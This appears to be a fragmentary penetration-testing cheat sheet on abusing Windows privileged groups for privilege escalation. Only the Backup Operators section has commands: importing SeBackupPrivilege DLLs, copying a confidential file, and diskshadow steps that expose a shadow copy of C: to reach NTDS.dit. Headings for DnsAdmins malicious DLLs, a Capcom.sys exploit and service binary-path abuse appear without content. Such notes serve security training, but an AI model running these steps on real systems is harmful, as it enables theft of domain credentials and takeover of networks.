Windows Group Privileges
Backup Operators
1 Import DLLs
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll2 Enable SebackupPrivilege
# Enable
Set-SeBackupPrivilege
# Verufy
Get-SeBackupPrivilege3 Copy File
copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txtCopy NTDS.dit
diskshadow.exe
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exitBackup SAM + SYSTEM Hives
Extract NTDS
Event Log Reader
Check Membership Group
Searching Security Logs
DnsAdmins
1 Generating Malicious DLL
2 Load DLL
3 Restart Service
Print Operators
1 Compile CPP File
2 Add Capcop.sys
3 Verify Privilege Enables
4 Run Exploit
Server Operators
1 Query Service
2 Service Permissions Check
3 Modify Service Binary Path
4 Start / Stop Service
5 Dump Hashes
Last updated